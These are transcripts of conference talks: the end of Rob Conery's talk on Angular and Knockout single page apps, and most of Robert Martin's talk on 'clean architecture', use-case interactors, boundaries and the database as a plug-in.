to get really interesting. With the injection pattern that you use with Angular, you're more focused on building components. And this is what I was talking about with Tom Dale yesterday who's on the Ember team. They're focused on URLs and all this stuff that happens in the DOM. Angular is focused on components. And when you start using it more and more, you start thinking about reusability a lot. One thing I haven't showed you is a thing called, what are they called? Directives. You can create a directive that basically encapsulates functionality that you can drop into the DOM with its own HTML tag, which is crazy. And it will output stuff. A directive can have its own controller, its own template. It's really nuts. And so the neat thing with a module, when you start having modules like this, you might look at this and say, well, I work with monkeys and I also work with tigers. Maybe I'm going to abstract this now to an animal app. And then I'll tell it when it's going into configuration what animal it's dealing with. And then you can take that model and you can inject it into another module. And all you have to do is say, up here, you're going to also now work with my monkey app. And that's where your head starts to spin with what Angular is trying to do with its injection pattern. Did I answer your question? Cool. You have a question? Yeah. The question is, what do you think the best site and the best way is to learn Angular? And I'm going to try and be impartial and a nice guy, but tech pop, of course. No, we do have a video that it's, what does it cost? $15, I believe. There's another site called egghead.io, where I got off the ground learning it. I highly recommend just watch it. It's about 30 videos and they're 10 minutes apiece and they're awesome. OK. We have eight minutes left, so I set out to five things and I totally lied about that. And that's OK because, you know, it's my talk. What I really want to do is I want to show you some working code and let's go find it. Where did I put it? Right. OK. So let me just really quickly show you tech pub dot com. OK. So this is tech pub's live site. And this little spinner thing here, no, that's a lie. Let's go to here. This thing right here. It's powered by knockout. And it's noticing that I'm logged in. And so what it's doing is it's going back to our fulfillment server. It's taking my ID and it's saying, oh, Rob's here. And then the API comes back and shows a dump of data. And so it's telling me I can stream this. So I can go click this and I can go over to our streaming page. And then boom, the streamer shows up because it sees that I'm logged in. Again, powered by knockout. And this is our Shopify site. Shopify doesn't allow you to work with their, mess with their server stuff too much. It gives you some variables to play with. But I wouldn't have been able to do this if what it gave me. I don't have a URL, in other words, right here that's ready. I'd only want to show this URL for people that are logged in and that own it. So there's a lot of logic I have that I need to implement. That's all back on our delivery server. I just ping it with knockout and say, can they come in? So that's thing one. I'll show you this code in just a minute. The other thing, this right here, is all an Angular app. And one thing I didn't show you is the routing. But here I can show it to you. This is our administrative back end, or excuse me, our customer fulfillment back end, that is up on the knockout site. This is using resource and all the things, services and injectable stuff. And if I click on my videos, it'll hit the server and come back and say, here's what you can watch. And here's all the videos. I can download them from here if I want. Subscriptions and coupons and I can click renew. So this is a single page app in a classic sense. This is why I like single page apps. I could not have built this any other way. In fact, if I couldn't have done this with Angular, I couldn't have used Shopify. Because we moved to Shopify from an old system that I built by hand. Moving to Shopify allows me to focus on videos and not selling stuff, which is great for people because then they could watch more videos. But one thing I couldn't do is pull in all of the old orders for my customers and all the things they own. So what am I going to do? I got to show them that stuff. Well, working with a single page app allowed me to do that rather easily. I did run into trouble, but we can talk about that another time. So I want to show you, in fact, if you guys want to know what trouble I ran into, please come up here. I'll show you. It's all with internet explorer. I wanted to show you. Oh, that's right. Let me really quickly open this up here. Open recent. Oh, come on. Just give me one second. I seem to have lost it. There it is. This is my Angular app that you just saw. I put it on just one page because I'm lazy. So the amount of code to the fire, that whole thing is 195 lines of code. And I find that pretty compelling. And this is one reason that I really have enjoyed Angular to come all the way back to the beginning where I said, this is my journey. I have learned enough JavaScript to know that I don't want to dabble with it more than I have to. I know that I suck at programming, if you can't tell that already. But Angular actually made it easy for me to slide up the complexity scale if I needed to add a single thing I could. So for instance, if you have a Stripe subscription with us, it's all the few lines to go and cancel it. Bam. I send this back to a fulfillment server and it's done. I have a nice message and that's that. I have a single controller in play. I have, let's see, let's see what this is. No, I'm sorry, I have a single, I have two controllers. Don't I have more controllers? Ignore me. I don't know what I'm saying. I have a service up here that I inject down below and you can see right here I have the minification stuff handled as I mentioned before. So all this gets crumpled down and minified and shoved up to Shopify. And so it's 195 lines of code and it enabled me to do something good for my business and that to me is the ultimate payoff. So we're coming in to the final bits. Does anybody have a question that they want to ask about anything? Shout it out. Say it one more time. Oh, yeah. The question is testing and how do you test Angular and all these frameworks? Well, there's a ton out there and I was going to get into it, but once you start talking about testing anything, you start talking about writing tests and then people will say, you shouldn't do that dude and then you get totally lost. So with testing Angular, there's a couple of frameworks. There's one called Karma that comes from the same team that made Angular. So it's a great thing to use and in fact they have two ways to test it. They have you straight up unit tests and what Karma will do is it'll run Node.js and it'll pull in your code and run it inside Node.js, which is freaky and then it will somehow allow you to test it against headless browsers that it also has access to. Don't ask me, I don't know. So they have that. They also have an acceptance test engine and it's called, does anybody know the name of it? Shout it out if you do. It will actually scan your DOM and click on things and so you just orchestrate it. Scenario runner is what it's called and it comes bundled. So if you want to get started with Angular and you want to just see how to do it all, there's a site called Angular Seed, it's github.com, I believe, slash Angular and then Angular Seed and then you download it and it's ready to go. The testing framework is plugged in. All the patterns are kind of there and explained, which is a lot of fun. I, to be honest, I just use Jasmine and the neat thing about using Jasmine, which is just a straight up test runner, is this stuff right here, these are just regular objects and so I would just mock stuff by hand and so to, and then just inject it straight in whenever I wanted to test this service. So I'd instantiate the service and I'd create an object that had a thing called get whatever on it and it would return an array and that was that. It was as easy as can be and that's one of the reasons I really like Angular, it's just working with basic objects. Answer your question? Okay. Anybody else? Okay. Thank you for putting up with me and my missing voice and I hope you guys enjoyed it.
|
If you're a web developer, chances are you've heard the terms "Single Page Application" and "Javascript MVC Framework". But what do these terms mean - and should you care? And what are these frameworks? In this talk Rob Conery explores 3 popular frameworks (Backbone, AngularJS, and Knockout) from a conceptual level, as well as a pragmatic one. Rob will explore the strengths and weaknesses of each with lots of code (and some hair-pulling) along the way.
|
10.5446/51497 (DOI)
|
Hello, everybody. How fast are we moving? Thank you. In reference to what? That is the correct answer. The question about how fast someone is moving cannot be answered unless you know some other frame of reference, unless you compare it to some other frame of reference. We do not appear to be moving with respect to each other very fast. On the other hand, we are on the Earth and the Earth is turning at a very sizable rate of speed. Of course, the Earth is roaring around the Sun at a certain speed pretty fast. The Sun is tearing around the galaxy at a really fast speed. The galaxies are moving together, our particular two, Andromeda and Milky Way, are moving together at a very fast rate of speed. Most of the galaxies are actually tearing apart from each other at a very fast rate of speed. So the question about how fast we are going is relative. This is a principle that was first expounded upon by Galileo. Galileo said, if you are on board a ship and you're in a cabin with no windows, if the sea is flat and you cannot feel the waves, then there is no experiment you can perform inside your cabin that will tell you how fast the ship is moving. Some guys in the 1830s started doing experiments with electricity and magnetism. They had recently discovered that there was a link between the two. Prior to that, nobody had known that they were related. And one of the things they discovered was that there was a mathematical relationship between the unit of electric charge and the unit of magnetic charge. It turned out that if you divided them in just the right way and did the unit analysis, you got meters per second. You got a velocity. When they measured the physical quantities accurately, they found out that that velocity was 3 times 10 to the 8th meters per second, the speed of light. Can you imagine the chill that went down their spine as they did that math and they saw this constant pop out that they knew very well? What does electricity and magnetism have to do with light? No one knew the answer to that question. But a more disturbing aspect was that that division, that little experiment violated Galileo's principle because in an inside room without any windows, you can do that experiment and a velocity comes out relative to nothing. No frame of reference implied. The physicists of the day thought, well, we got to have some kind of frame of reference. There's got to be a frame of reference. Let's invent this stuff called ether. It permeates all of space. It's frictionless. It's massless. And the waves of light wave the ether. Obviously, waves must wave something. Something's got to be waving if there are waves. And so the waves of light wave ether. And they came up with brilliant experiments to detect the ether, all of which failed horribly. It's difficult for us to imagine now how wildly disappointing and extremely disturbing these experiments were right around the 1900s when they tried to detect the ether. And every experiment they did failed. They tried experiment after experiment after experiment. They spent really large amounts of money comparatively. This was the first really big science. They had whole rooms full of concrete equipment and big massive pads that were isolated from vibration and the light sources that were really perfect. And they could not see the ether. It took Einstein in 1905 to say, well, there's no ether. And he made this remarkable statement that everybody's kind of going, well, how did he come up with that? He said, there's no frame of reference for the speed of light. No frame of reference at all. Everyone will always measure light going at exactly the same speed. No matter how fast the source of the light is moving, no matter how fast the measure is moving, any time you measure a beam of light, irrespective of any other motion, you will measure the speed of that light past you at three times 10 to the eighth meters per second. And from that postulate, he came up with the special theory of relativity. Has anybody read that paper on the electrodynamics of moving bodies? 1905. This is a five-page paper, maybe seven pages. It's very short. Nothing more than high school algebra. There's no real interesting math in there. Einstein wasn't a mathematical genius at the time. Maybe he never was, but at least at the time he was. And he just came up with this bizarre idea, and he followed the very simple mathematical pathway to come up with E equals MC squared. E equals MC squared, interesting equation. Energy equals mass times the speed of light squared. But energy is equal to mass times velocity squared, one half mass times velocity squared, and velocity is relative, which means that energy is relative, which means that mass is relative. We don't have an absolute mass. Our mass is relative to another frame of reference. I do not mass at 205 pounds. I do that on the earth, but by some other frame of reference, I have a completely different mass. How can my mass be relative? Mass must not be what we think it is. Well, I'll leave you with that thought, because we have other things that we need to talk about. Architecture. The genesis of this talk was about three to four years ago, and it came about because my son, who is the founder of this company, I now work for him, came to me with an application written in Ruby, and he showed it to me, and I noticed something. And it was the first time I had noticed this something, but it was a common something. It was common to most Ruby applications. So I went back six or seven years to a Ruby application that I had written, and I noticed the same thing. This is the high-level directory structure of the application I wrote in 2004-ish timeframe, 2005-ish timeframe. And notice the directories. At the highest level, we've got substitute, whatever the heck that is, and then immediately below that, we have these directories that have very familiar names, controllers, models, views. This is what I saw when my son showed me his application. This is what I did when I did my Rails application, but on this particular event, I looked at it and realized there's something wrong with this. Why is this application at its highest level telling me that it is composed of models, views, and controllers? Why isn't it telling me what it does? At its very highest level, why isn't it telling me what it does? Why is it telling me how it's made? I thought about that for a minute, and I began to realize something. This application was put together using a common web framework, Rails. Some of you probably use another common web framework, either in.NET or in Java or whatever platform you are using, and very likely you have some similar kind of directory structure which exposes the elements that that framework demands. Why is it that the first thing I see is the framework? Why does the framework dominate? Why does the web dominate? Here's the thing that was bothering me. The web, for all its complexity, for all its importance, the web is a detail. It's not the essence of our application. The web is an IO channel. Why would we structure our application around an IO channel? Why would the IO channel dictate the structure at the highest level of our application? There's something wrong with that. There's something wrong with that idea, because I went and I got some blueprints out, and I looked at those blueprints, and I found, for example, this one. This is the blueprint of a library, and if you look at it, it's obviously a library. There are bookshelves that hold journals. There's a circulation desk. There's a video collection. There's this area over here with PCs on it that you can look at. There's reading desks. This is a library. The picture tells you it's a library, and if that doesn't convince you, this one will, that's a church. It's obviously a church. The architecture of the building tells you not what it's made of, not what its architectural frameworks were. It doesn't tell you that it's a concrete building. It doesn't tell you that it was built with hammers and saws. What it tells you is it's intent. Architecture is about intent. This is not a new idea. This is an old idea. It's an idea that has been around since probably the 70s or 80s. It came to a certain fruition in the 90s. Some of you know who this guy is. His name is Ivar Jacobson. Ivar Jacobson got involved with the whole rational suite of tools a while ago. He was one of the three amigos who worked with Grady Butch. Who was that other guy? I can't remember his name. Who did the UML and the rational unified process. All of that. But before he did that, he and his cohorts wrote this book. This book came out in 1992. Object-oriented software engineering. I remember when it came out. We were all very excited. This is 20 years ago. We were all very excited about this book because it was the first time someone had used software engineering principles to describe object orientation. 20 years ago we were all very, very excited about object orientation. What Ivar said in this book was that use cases drive the architecture. Does anybody remember the whole use case fiasco? The horrible nightmares of use case forms that happened during the 90s and then into the 2000s. Every consultant out there came up with some new form for how to fill out use cases appropriately. They involved these blanks that you had to fill in the primary actors and the secondary actors and the tertiary actors and the preconditions and the post-conditions. They had it all laid out for you. It was a nightmare. But that's not what Ivar was talking about when he wrote this book. A use case written by Ivar might look like this. A use case is a description of an action that a user will perform on a system. It describes how the system processes that action and what data is returned by the system. Here I've got a create order use case. This use case might be part of an order processing system. I describe the data that would go into this use case. Customer ID, shipment destination, payment information, customer contact info, shipment mechanism. Notice that I am not specifying any detail about this information. I don't care about the detail right now. All I want to do is say, hey, there's some kind of shipment stuff going in. I don't know what it looks like. Maybe we'll figure that out later. Then next, I talk about what the system does with that data. Order, clerk, issues, create, order command. That's actually not part of the use case. That's what starts the use case. System validates all data. Well, that would be the data being validated up here. Notice that I don't say how it's being validated. I just say, eh, somehow it validates it. I don't know how. System creates order and determines order ID. I presume that's some kind of database action, the identification of an ID, but I'm not going to say that here. The system delivers the order ID to the clerk. It doesn't say how. You could easily imagine that these fields of data are gathered on a web form. You could also easily imagine that the order ID being delivered back to the clerk is being delivered on a web page. But nothing here says that. Nothing here binds you to the web at all. There is no indication of the web here. The I.O. channel is completely gone. I don't mention it at all. This is the kind of use case that Jacobson was talking about in 1992. A use case, not a web use case. Then Jacobson went on to describe how this could be broken up into a set of objects. He said, eh, you could take that use case and you could put it in an object. There could be a create order use case object. I call it an interactor here. He called it a control object. I don't like to call it a control object because that makes it confused with model view controller. Other people have said, you know, Bob, you could have called it a use case object. This sounds like a very good idea to me. Maybe I should change the name from interactor to use case. In any case, this is an object. This object encodes the processing rules in that use case. Somehow. I don't care how. We'll figure that out later. There must be a method on this object, a method, something like execute. What pattern is that, by the way? If you've got an object that's got a method called execute, what design pattern is that? Command pattern. Yeah, there's probably a command pattern. So I've got this interactor. It's got a command and an execute. When I call execute, it does what is necessary to execute the use case. But notice I've got some words here. Interactors have application-specific business rules. What does that mean? There are two kinds of business rules in an application. And keeping them separate is necessary for a good architecture. The one kind of business rule is the kind of business rule that is particular to the application being executed. It wouldn't make sense in another application. But the other kind of business rule is the business rule that transcends the application and could be executed in many different applications. Sometimes we call the first kind interactions, which is why I called this an interactor. The communication back and forth between the user is often application-specific. Whereas the lower-level business rules, the more fundamental business rules are application agnostic. Where do we put the other kind of business rule? Jacobson put them in a thing called an entity. Nowadays we would call this a business object. If you're a fan of Eric Evans, this would go in your domain-driven design. This is part of your domain model. The interactor is not. The interactor is part of your application model. These two models are separate. The interactor tells the entity what to do. In fact, there are probably many entities involved with creating an order. There might be a customer entity and an order entity and a product entity. And the interactor would control all of those entities in the context of creating an order. The last kind of object that Jacobson talked about was the boundary object. I have drawn them here as interfaces.net interfaces or Java interfaces. Why do we have interfaces? Where did this come from, this artifact of these two languages, Java and.net? Why does C-Sharp have interfaces? Yeah, that's a nice way of saying it, but no. C-Sharp has interfaces because Java had interfaces. Why did Java have interfaces? What was the rationale for putting interfaces into Java? Keep in mind that you could make a completely abstract class in Java by saying abstract class, something, and make all of the methods abstract. Why do you need a special keyword to make sure that all of the methods are abstract? Certainly, this is not what we did in C++. In C++, if you wanted a interface, we didn't even have a concept, by the way. But if you wanted an interface in C++, you just had a bunch of pure virtual methods. You just made them all abstract. You didn't bother with some new keyword. Why did we have this keyword in Java? We didn't like multiple inheritance. That was exactly the reason. The authors of the language did not like multiple inheritance. They did like multiple implementation of interfaces, but they didn't like multiple inheritance of classes. Why not? To implement. It's a pain in the butt to implement if you're a compiler writer. They were lazy. They didn't want to implement multiple inheritance. It's hard to do multiple inheritance in a compiler. There's all kinds of horrible ambiguities. The problem can be solved. It was solved in C++. It was solved in Eiffel. It was solved in Lisp. Problem can be solved. By the way, solving that problem is very useful. It would be nice if we had multiple inheritance of implementation. But we don't because the compiler writers were lazy. Then they kind of smoothed it over by saying, oh, but we're protecting you programmers from yourselves because the multiple inheritance is actually really ugly. You know, compiler writers, here's a little clue. I'm an adult. You don't need to protect me from myself. If you're going to be lazy about it, just say you're going to be lazy about it. But don't make up some goofy story about how you're protecting me from myself. All right. I'm ranting. Sorry. These boundaries are interfaces. Now, notice the pattern of usage here. The interactor implements one of the interfaces. This is the input boundary. All data comes in through that boundary and gets polymorphically deployed inside the interactor. This is the output boundary. All data goes out through that boundary. Notice that all of the dependencies point outwards. That's important. We'll come to that a little later. These are the three objects that Jacobson identified in his architecture in 1992. Something happened. We had this. It was part of our culture. Everybody was talking about this book. Everybody was talking about the BCE model, the boundary controller entity model, which I've turned into the boundary interactor entity model. The BCE model, really important, blah, blah, blah. It was a very big deal. Then something happened. Does anybody know what that was? Think back in time. What was happening right around 1993, 94, 95? What strange thing was happening to our industry? Some of you weren't born then. Well, most of you were probably born then. Some of you were probably still in grade school. The web happened. The web happened in 1993, 94, 95, 96, and the whole development world turned upside down. All of a sudden, everything changed. That's what we thought. We thought everything changed. Everything changed. We had to hire people, lots and lots and lots of people. If you had a J in your name, you could get hired as a Java programmer. We hired rafts and rafts of people. Kids went to school to become programmers because they could get rich overnight by day trading on the web. It was not a very healthy time. We're seeing some echo of that right now in the social networking communities. There's a bubble going on in the social networkers. I don't know if it'll pop the way that the dot com bubble popped. I kind of hope it doesn't. I kind of fear it will. Although the pop of that bubble will not be quite as damaging as the pop of the dot com bubble. Does anybody remember 2001? Remember that you had a job one day. You did not have a job the next day and had no idea when you would get a job the next day. If you were unlucky enough to be working at a company that was very successful the day before, you probably owed the IRS several million dollars and had no way to pay it the day after. There's quite a few people who went completely bankrupt because their stock options had made their wealth look very large and then after the crash, the IRS said, wow, you still have to pay taxes on that, even though there was no money there. Lots of programmers were walking around holding signs, you know, will code for food. It was not a good time and it was a very scary time. And during that time, we were building systems still. But we were frightened and scared and it was a time of deep insecurity. So anytime anybody came along with something that might help, we would grab it. What might help? J2EE. A framework might help. A new platform might help. What was one of the early ones? JSF, that was kind of later. Struts. Anybody remember struts? Anybody remember these frames? We would grab onto them. Oh, good, something to help because, you know, if we don't get things written really fast, we're going to lose our jobs and that's really bad. And during all of that turmoil and chaos, we forgot about this. It went away. Forward space now. 2003, 2004, 2005. One of the frameworks that pops up pops up in the Ruby space. Do you have any Ruby programmers in the room? A couple. Okay, good. There should be a lot more of you. Part of the symptom of the social networking bubble is that in the United States anyway, if you can write Ruby code, then you can write any number on a piece of paper and someone will pay that number to you because there aren't enough Ruby programmers right now. So in the U.S., Ruby programmers that are at a high premium, I have seen whole companies purchased for many millions of dollars for the purpose of getting the Ruby programmers. Screw the business model, throw all the customers away, just give me those Ruby programmers and sign them to a contract for two years. I think that bubble is going to pop. Never mind that. If you are not familiar with Ruby, you probably should be at this point because this language is getting more and more important and we'll continue to get more and more important. Languages have this tendency to rise and fall. If you're a long-term programmer, you want to be a career programmer, you have to recognize when a language is starting to rise and you have to kind of watch it and learn it. Then at just the right time, you're kind of surfing these waves of languages and you're surfing the Java wave or the.NET wave, but the Ruby wave is out there and you know enough about it and at just the right moment, you leap onto the new wave before the old wave goes down. You don't want to ride those waves down. It's not pretty down there. So 2004, 2005, 2006, in the Ruby community, this guy by the name of David Hannah Meyer Hansen, brilliant fellow, invents a framework called Rails. And this really turns the Ruby community on its head because all of a sudden it was very easy to get initial web applications working with Rails. It was really a matter of typing a command or two, writing a few lines of code and you had a website up. Didn't do much, but then you could very easily incrementally develop this website and the development time was fast and you could do this, do that, it was like magic. Of course, like all frameworks, it had its limitations and to do any kind of significant website was not nearly that easy, but still, it was very, very powerful. The Rails way of thinking carried a lot of baggage with it, just like any framework does. If you are a struts developer, the struts way of thinking carries a lot of baggage with it. If you're a.NET developer, the framework in.NET carries a lot of baggage with it. There's this stuff that you are supposed to do, these classes you are supposed to inherit from, these other classes you are supposed to use, and it dominates you. And all the examples you read show how you are directly using this framework to get stuff done. And none of that pays any attention to this. So this disappears, it fades into the background. How should this work? Well, I've got a user out here. This guy is using the web, if we call that the web, it's some delivery mechanism, I really don't care if it's the web or not. And this delivery mechanism, somehow or another, walks through these boundaries to my interactors, which talk to my entities. Now, let's trace a command through. The user does something, he fills out a form and he pushes a button. And what happens is that the delivery mechanism does whatever it does to validate the data, and God knows what else it does, but then it creates a request model. This request model is a data structure. It is a plain data structure. It does not know about the web. There's nothing in it that knows about the web. It does not derive from any framework based on the web. It is not an instance of HTTP request, it is just a data structure. In the simplest case, it's an argument list to a method in the boundary object. In the more complex case, it's just a plain old Java or.NET object that gets passed in to the boundary object. It polymorphically deploys into the interactor. And the interactor looks at it and says, oh, I guess I've got to do some work. So it uses the data in that request model to start calling methods on the entities. The interactor controls the dance of the entities. It is the choreographer of the methods that go out to the entities. And once the job is complete, the interactor reverses the flow and starts pulling data back out of the entities to construct another data structure called a result model, or a response model, if you wish. The result model is still just another raw data structure, no trappings of the web, no knowledge of the web. The result data structure goes back through the boundary into the delivery mechanism where the delivery mechanism displays it somehow or another. Can you test that stuff without the delivery mechanism? Of course you can, right? You pass the data structure in, you get the data structure out, you look at the data structure. Does the web server have to be running if you're a web application? No, this is by the way the goal, one of the goals. You should be able to test all your business rules without the web server running. Web servers are a pain. They get in the way, they take a long time to boot, they take a long time to tear down, there's all kinds of configuration, testing while they're running is a pain. I would like to just test all my business rules by passing a data structure in, getting a data structure out. Real easy. Without any other stuff running, I don't want any other processes running, I don't want the web server running, I don't want my framework in the way, I just want to be able to test my business rules. What about Model View Controller? I thought that was the architecture of the web. Of course we fiddled with it, then we turned it into Model View Presenter and Model View Presenter Control and Model View View Model and MVVM and all these other things. Where did this Model View Controller thing come from? It came from him. I cannot say his name properly, you can probably say it better than I, I would say it Trig V. Reinskog. I'm probably saying it wrong. I met him last year, here at NDC, he gave a talk here. I was up in the speaker lounge and I was looking for a place to plug my laptop in and I'm wandering around looking for a place and this guy, old guy hands me a power strip and I look up and Trig V. Reinskog and I take the power strip from him and our hands brush, my finger touches his, and I haven't washed that finger. It's Trig V. Reinskog. This guy invented Model View Controller in the 70s in small talk and the way Model View Controller worked back then, very simple, we would have some small object which encoded a simple business rule, nothing very elaborate or big. These were generally small things, not big things. We would have a view, the view would hang what we would now call an observer relationship on the model. The view would register with the model, the model would call back to the view saying, by the way, something in me changed, you need to update. And again, this was something relatively small and there would be a controller object. The controller object would look at the mouse and keyboard and translate user gestures into commands that were relevant to the model. Input, process, output, real simple kind of pattern. This was used in the small. These objects were small. You would have a Model View Controller for a button. You'd have a Model View Controller for a circle. You'd have a Model View Controller for a radio button, a Model View Controller for a text field. These were little things, not a massive application architecture. We've changed that. And why did we change it? Well, there's this thing that happens in software and it probably happens everywhere. Some name gets associated with good. MVC is good. Now, I'm a guy, programmer, and whatever I do is good because, well, I'm good. And somebody says, MVC is good. Well, that must be what I do because I'm good. And so, you've heard this done before, right? And, oh, we're doing, oh, oh, oh, what's oh, oh, oh. Oh, yeah, I've been doing that for years because, you know, I'm good. So, this is probably what happened here. Something like this because what we now have doesn't look much like Model View Controller to me. This is Model View Controller now as it is done on the web. We have these controller things. Now, controllers are not the first things to look at user input, right? We've got the whole web server out here. First, the web server is doing all the pathing and the routing and the gathering of data and all that gunk. Once the whole pathway has been resolved, we can finally call a controller with an HTTP request or some equivalent. The controller then goes to the use cases, the business objects, I should say, and it starts telling the business objects what to do. And at some point, the controller hands the control off to the view. And then the view reaches into the business objects and pulls a bunch of junk out of the business object and displays them. And this rat's nest of dependencies is the result. What happens to the business objects in the heat of battle is that they begin to acquire controller-like methods because the controllers need to tell the business objects what to do and the programmers are so busy that they don't remember to keep the controller stuff separate from the business object stuff. So you start getting controller-like stuff in here. And then the guys writing the views need methods on the business objects to get at the data. And you start getting view-like methods in the business objects and the business objects become this kind of hybrid thing of half controller, half business object, half view. I know that adds up to one and a half. And the math works anyway. So probably we have problems here. Now, you can do this well, but most people don't. They're in the midst of a flurry of activity. And the boundaries are not well enough defined to do this well. How do we do it in the clean architecture, the Jacobson architecture? This shows the output channel. Here's our interactor. Our interactor has been working with entities. And it has now created the response model. It's about to send the response model back out to the user interface. The object that implements the output boundary that the interactor communicates with is called a presenter. The job of the presenter is to take the response model and turn it into yet another data structure. This new data structure is called the view model. And the view model is this very interesting data structure that looks like it is targeted at the web if you're in a web application. It looks like it's targeted at the web. It does not know about the web. It does not depend on any of the web frameworks. It is still independent of the web. But if you are putting something on a web page, there is a field in this data structure for every element that would appear on that web page. If you have buttons on the web page that have names, there are strings in here that contain those names. If some of those buttons should be grayed out, there are booleans in here that tell you what the state of those buttons ought to be. If certain numbers ought to be read, there are booleans or enums in here that tell you what the color of certain fields ought to be. Anything that appears on the web page is represented here in the view model in unambiguous and complete ways. The only thing left to do is to put it on the page. And that's what the view does. The view looks at the view model and just says, okay, take that field, put it here, take that field, put it here, take that field, put it here. You might have a loop in here that loops through some table, but you're not going to have any if statements in here or not too many. You might have a if enabled, turn it gray, if not enabled, turn it black. You might have that kind of if statement. But there's no processing in here. The view is so denuded of functionality that it doesn't need to be tested. No automated test needs to be written for it because there's no worthwhile code in here. Of course, that also means it's easy to test if you want to. It's really easy to test something that doesn't have a lot of code in it. Can you test the presenter? Yeah, it takes an input data structure. It creates an output data structure. You can test the presenter. Do you need the web server running to test the presenter? No. You can see a pattern developing here, can't you? What is that pattern? The pattern is this boundary. That boundary, that black line right there is a component boundary. Across that black line, all dependencies must point inwards towards the application. Anything outside of this black line must point inwards. Why? Because the stuff out here is a plug-in to the application. Who's using Resharper? See? We're making progress here. This is good. Visual Studio becomes almost usable if you have Resharper in it. Does Visual Studio know about Resharper? No. Not one line of source code inside of Visual Studio knows that Resharper exists. Resharper is a plug-in. The web should be a plug-in to your application. Not one line of code in your application should know that the web exists. You put the web in a different DLL entirely and you plug it into your application. If you don't like the web, plug something else in. Maybe you'd like a service oriented architecture. God help you using soap. Yikes. But you could plug it in. You want to use a thick client? Plug it in. You want to use a console app? Plug it in. Plug it in across that boundary. Make sure all dependencies point across the line. Now, I'm not naive enough to think that the API created here would serve for both a web and a thick client and a service oriented architecture. There would obviously be some differences across that boundary, but those differences are manageable if you bind the framework to the application you lose control. Here's what the whole thing looks like without the entities. Our controller still exists. We still use Model View Controller, but notice that Model View Controller is entirely on the left side of the line. Our application does not know about Model View Controller because Model View Controller is a delivery pattern. Our controllers live on the left side of the line. They construct these data structures which are passed into the interactor which manipulates the entities which creates response models which the presenter then turns into view models that get viewed. And all of this is testable and all of it's nicely decoupled and all of it is a plug-in architecture. What about the database? Databases. If there is a word that has defined our industry for the last 30 years, if there is a word that strikes fear into the hearts of developers, for the last 30 years that word would probably be database. Does that look familiar to you? The database is the great God, the altar upon which we all worship. The applications are minions to the database. All applications serve the database according to the database rules and the priests of the database are the great DBAs in the sky. We have built this kind of philosophical structure. We have given a lot of weight to the database. The database becomes important. The data model is critical. We have to protect our data assets. Who came up with that lovely term? It's a good marketing line, isn't it? You've got to protect your data assets. Oh, yeah, I guess we do. Pay me millions of dollars. I'll sell you a tool that will protect your data assets. Okay, there's a certain amount of marketing business going on here and it makes perfect sense. Why do we have databases? Database processing engines. Why do we have these tools like SQL server, like Oracle? Why do we have them? I mean, what goes into a database? Bits. Bits. We know how to put bits places. We store bits in places. We put bits in memory. Why do we have databases? The reason we have databases is historical. We use to put data on rotating bits of steel coated with a magnetic emulsion. Some of us still do. Is there a rotating memory in this room? Does someone have a disk in their laptop? No one will raise their hand. They don't want to admit that they're living in the early part of the 2000s. But the fact is that the disk is dead. You might have some disks still, but bit by bit the disks are dying. The solid state memories are taking over. I have a half a terabyte of solid state memory in here. The next laptop I have will probably have two terabytes of solid state memory. Terabytes! Terabytes! Do you know what that word means? Can you imagine? Like, I'm this guy in 1977 and I had to buy my first PDP 11 and I had to scope out how big the disks ought to be. And I was just walking around the halls of my company laughing hysterically like the wicked witch of the west. 25 megabytes! Terabytes! The RAM disks. There, they're not RAM disks. I can't call them that. The RAM is coming. And as the RAM comes, you and I will have this interesting option because RAM is not addressed the way disk is. There's no spinning memory. There's no heads. There's no records. There's no sectors. There's no rotational latency. There's no seek time. So we can get at any byte equally fast as any other, which means we don't need the indexes. We don't need the special access methods. We don't need any special software to manage the data that's on some very difficult to use medium because the medium is not difficult to use anymore. It's an address space. And we've got 64 bits of address space. Well, hell, we'll just put it all in RAM and treat it like computer memory. This is what's happening. If I were Oracle, I'd be scared to death because the very foundation of why I exist is evaporating out from under me. We are now moving into the realm where SQL will become something that people don't know how to spell. We won't be using these odd query statements anymore. Even link might start to look antiquated, even though it's very cool and everything. We might suddenly start looking at all data as though it's just part of our memory. What's the worst problem that databases have? The most complicating part of a database? Transactions. You've got to open them. You've got to roll them back. You've got to commit them. You've got to know what goes in them and what doesn't. If you do it wrong, you get concurrent update problems. You get deadlocks unless you've got a good system. This whole business of locking stuff. What if we have so much memory that, and our processes are so fast, that we don't need to ever delete anything again. We don't need to update anything. What we'll do instead is we will simply record every transaction. Just stick every transaction in the database. We will not record the state of an account. We will not record the state of a user. We will not record the state of anything. We will simply record all the transactions. We will recompute state anytime we want. Maybe we'll take a snapshot of state every day and then recompute state on a daily basis or so, but we will not save state. If you don't save state, if all you save are transactions, then you don't have CRUD applications anymore. There's no updates and there's no deletes. You don't have CRUD applications. You have CRU applications. You can create and you can read. If all you're doing is creating and reading, there's no transactions. Transactions go away. All the concurrency disappears. All that horrible nonsense of committing and rolling back and all that, it just goes away. Is that where we're headed? You use a system like this right now, probably, if you're sane. You have a source code control system. That source code control system works exactly that way. It stores transactions, it does not store state. It reconstructs state every time you check something out. It decomposes that state whenever you check something in. We use a system like this now to manage our code. Maybe it's time our clients got to use a system like that too. In any case, the database is a detail. The database is a place to store bits. The database is not the center of our system. It's just the thing that holds the data. Like any detail, we would like our architecture to treat it like a plug-in. I do not want my application to know that the database exists. I want my application free of any knowledge of the database. I don't want anything about the schema up here. These are not schemas. These are not rows in a table. These are business objects. How they are composed is, I don't care how they're composed. These are not data elements. They are bags full of methods. What is an object? What is an object? Is an object a bunch of data? No. An object is a bunch of methods. You're not allowed to see the data inside. You're not even allowed to know that there's data in there. All you can see of an object are the public methods. An object is a bunch of methods. If there happens to be data inside, that's none of your business. These are bags of methods. I don't know what data they contain. I can't see that. I can't know that. I don't want these guys to know that. I want this stuff to know that. I want some gateway interface that allows my interactors to fetch entities across this boundary. All the database stuff I want living down here. Who's using an hibernator? Hibernator. Some kind of ORM. That stuff lives down here. Not up here. Down here. Below the line with all dependencies pointing upwards. Nothing about the application knows that there's an ORM. The notion of ORM makes no sense to the application. By the way, the notion of ORM makes no sense at all anyway. There's no such thing as an object relational mapping. You cannot map data to functions. What you can do is you can hydrate data structures. That's what an ORM does. It hydrates data structures. It loads them from a database of some kind. I want all the database stuff living down here. I want you to write your applications such that all the business rules are contained in a component or a set of components. Then I want all of the UI stuff to be plug-ins to those components. I want all the database stuff to be plug-ins to those components. If you've got any third party stuff that you're dealing with, plug them into the components. I don't want your application to have outgoing dependencies. Your application is composed of business rules. Those business rules are the family jewels. You keep those jewels in a nice little bag and you don't let people 